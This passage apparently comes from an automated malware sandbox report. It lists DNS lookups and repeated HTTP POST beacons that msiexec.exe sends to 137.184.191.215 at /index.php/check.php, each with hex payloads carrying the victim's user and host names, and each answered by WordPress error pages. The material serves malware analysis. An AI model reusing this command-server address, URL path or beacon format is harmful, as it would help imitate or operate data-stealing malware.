                                        Oct 2, 2024 07:19:33.230196953 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.381107092 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.385958910 CEST8059092137.184.191.215192.168.2.4
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 2, 2024 07:18:22.771497965 CEST | 57433 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 2, 2024 07:18:22.778239965 CEST | 53 | 57433 | 1.1.1.1 | 192.168.2.4 |
| Oct 2, 2024 07:18:24.759563923 CEST | 58896 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 2, 2024 07:18:24.766527891 CEST | 53 | 58896 | 1.1.1.1 | 192.168.2.4 |
| Oct 2, 2024 07:18:51.722301960 CEST | 53 | 54495 | 162.159.36.2 | 192.168.2.4 |
| Oct 2, 2024 07:18:52.206317902 CEST | 63051 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 2, 2024 07:18:52.214292049 CEST | 53 | 63051 | 1.1.1.1 | 192.168.2.4 |
| Oct 2, 2024 07:19:04.025243998 CEST | 61699 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 2, 2024 07:19:04.033066988 CEST | 53 | 61699 | 1.1.1.1 | 192.168.2.4 |
| Oct 2, 2024 07:19:05.189321995 CEST | 50905 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 2, 2024 07:19:05.207438946 CEST | 53 | 50905 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 2, 2024 07:18:22.771497965 CEST | 192.168.2.4 | 1.1.1.1 | 0xcdc5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Oct 2, 2024 07:18:24.759563923 CEST | 192.168.2.4 | 1.1.1.1 | 0x5e67 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Oct 2, 2024 07:18:52.206317902 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfca | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Oct 2, 2024 07:19:04.025243998 CEST | 192.168.2.4 | 1.1.1.1 | 0xe283 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Oct 2, 2024 07:19:05.189321995 CEST | 192.168.2.4 | 1.1.1.1 | 0xc554 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 07:18:22.778239965 CEST | 1.1.1.1 | 192.168.2.4 | 0xcdc5 | No error (0) | drive.google.com | | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 07:18:24.766527891 CEST | 1.1.1.1 | 192.168.2.4 | 0x5e67 | No error (0) | drive.usercontent.google.com | | 142.250.186.33 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 07:18:52.214292049 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfca | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 2, 2024 07:19:04.033066988 CEST | 1.1.1.1 | 192.168.2.4 | 0xe283 | No error (0) | drive.google.com | | 172.217.18.110 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 07:19:05.207438946 CEST | 1.1.1.1 | 192.168.2.4 | 0xc554 | No error (0) | drive.usercontent.google.com | | 142.250.186.161 | A (IP address) | IN (0x0001) | false
                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • 137.184.191.215
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 59084 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:09.567332029 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 176
                                        Connection: close
Oct 2, 2024 07:19:09.572345018 CEST | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: 'ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C9HeyQ
Oct 2, 2024 07:19:12.302341938 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:10 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Oct 2, 2024 07:19:12.302764893 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Oct 2, 2024 07:19:12.302778006 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 59085 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:12.437366009 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 176
                                        Connection: close
Oct 2, 2024 07:19:12.483647108 CEST | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: 'ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2CclqRP
Oct 2, 2024 07:19:15.446930885 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:13 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Oct 2, 2024 07:19:15.447427988 CEST | 224 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Oct 2, 2024 07:19:15.447438955 CEST | 1236 | IN | Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Oct 2, 2024 07:19:15.448391914 CEST | 142 | IN | Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 59086 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:15.525146961 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
Oct 2, 2024 07:19:15.529973984 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
Oct 2, 2024 07:19:18.171447039 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 59087 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:18.329709053 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
Oct 2, 2024 07:19:18.355470896 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
Oct 2, 2024 07:19:18.605232000 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
Oct 2, 2024 07:19:21.012243986 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:18 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 59088 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:21.246655941 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
Oct 2, 2024 07:19:21.251872063 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
Oct 2, 2024 07:19:23.973371029 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:21 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 59089 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 07:19:24.150774956 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
Oct 2, 2024 07:19:24.164841890 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
Oct 2, 2024 07:19:27.547966957 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:24 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:27.549618006 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:24 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.4 | 59090 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:27.697428942 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:27.707361937 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:30.379097939 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:28 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.4 | 59091 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:30.545875072 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:30.551426888 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:33.224482059 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:31 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.4 | 59092 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:33.388360977 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:33.393218040 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:36.056476116 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:33 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.4 | 59093 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:36.215107918 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
